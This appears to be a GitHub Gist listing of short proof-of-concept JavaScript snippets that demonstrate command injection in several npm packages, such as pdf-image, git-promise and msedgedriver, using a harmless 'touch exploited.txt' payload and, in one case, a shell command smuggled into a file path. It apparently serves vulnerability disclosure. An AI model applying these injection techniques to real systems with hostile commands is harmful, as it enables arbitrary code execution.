Miguel Coimbra mcoimbra
mcoimbra
/ protractor-video-reporter-0.3.0_poc.js
Created
October 29, 2023 23:20
Package protractor-video-reporter: it is possible to take advantage of the 'options' argument of the VideoReporter constructor to execute a custom binary and arguments (authors only focus on ffmpeg executables...).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('protractor-video-reporter'); | |
| console.log(pkg); | |
| const options = { | |
| ffmpegCmd: 'touch', | |
| ffmpegArgs: ['exploited.txt'] | |
| } |
mcoimbra
/ postinstall-build-5.0.3_poc.js
Created
October 29, 2023 22:29
Package postinstall-build: it is possible to inject a custom command and arguments by pushing into process.argv.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('postinstall-build'); | |
| process.argv.push('touch'); | |
| process.argv.push('touch exploited.txt'); | |
| /* | |
| * This will lead to exec(cmd) with cmd = 'touch exploited.txt' on | |
| * line #326 of src/index.js. |
mcoimbra
/ pdf-merge-1.2.0_poc.js
Created
October 29, 2023 14:44
Package pdf-merge: it is possible to inject a custom binary and arguments for example to create a local file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('pdf-merge'); | |
| const args = ['exploited.txt', '']; | |
| const options = { | |
| libPath: 'touch' | |
| }; | |
| /* |
mcoimbra
/ pdf-image-2.0.0_poc.js
Created
October 29, 2023 14:27
Package pdf-image: it is possible to inject a custom command to be executed rather than imagemagick (the focus of this package).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('pdf-image'); | |
| console.log(pkg); | |
| const pdfFilePath = '" | touch exploited.txt "'; | |
| const options = { | |
| }; |
mcoimbra
/ msedgedriver-91.0.0_poc.js
Created
October 29, 2023 14:07
Package msedgedriver: it is possible to manipulate the binary and arguments passed to spawn by changing 'msedgedriver.path' and configuring 'args'.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('msedgedriver'); | |
| pkg.path = '/usr/bin/touch'; | |
| const args = ['exploited.txt']; | |
| const returnPromise = false; | |
| // This will create a local 'exploited.txt' file. |
mcoimbra
/ mocha-multi-reporters-1.5.1_poc.js
Created
October 29, 2023 13:57
Package mocha-multi-reporters: potential injection through 'require(name)' in src/lib/MultiReporters.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const fs = require('node:fs'); | |
| const path = require('node:path'); | |
| /* | |
| * Create a local 'custom.js' file so that the program flow can | |
| * continue within the call below. | |
| */ | |
| const filename = path.join(process.cwd(), 'custom.js'); |
mcoimbra
/ karma-cljs-test-0.1.0_poc.js
Created
October 28, 2023 22:32
Package karma: although focused on browser JavaScript, it is possible to require() the package and inject a command into another file of the package that is possible to require.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('karma-cljs-test'); | |
| const init = pkg['framework:cljs-test'][1]; | |
| const files = []; | |
| init(files); |
mcoimbra
/ harmonize-2.0.0_poc.js
Last active
October 28, 2023 21:42
Package harmonize: by editing the process.argv it is possible to influence the command and flags invoked inside harmonize.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('harmonize'); | |
| process.argv[0] = 'touch'; | |
| process.argv.push('exploited.txt'); | |
| const flags = []; | |
| /* This will create a local 'exploited.txt'. |
mcoimbra
/ git-rev-0.2.1_poc.js
Created
October 28, 2023 15:33
Package git-rev@0.2.1: it is possible to exeute custom code via a callback.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('git-rev'); | |
| const cb = function(error_msg) { | |
| const fs = require('node:fs'); | |
| let fd = fs.openSync('exploited.txt', 'a'); | |
| fs.closeSync(fd); | |
| } |
mcoimbra
/ git-promise-1.0.0_poc.js
Created
October 28, 2023 15:16
Package git-promise: it is possible through the argument to execute a binary which is not 'git', with the package README.md focusing only on running git commands.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('git-promise'); | |
| const commandOrArgs = 'exploited.txt'; | |
| const optionsOrCallback = { | |
| gitExec: 'touch' | |
| }; | |
| const callbackMaybe = function() {}; |
NewerOlder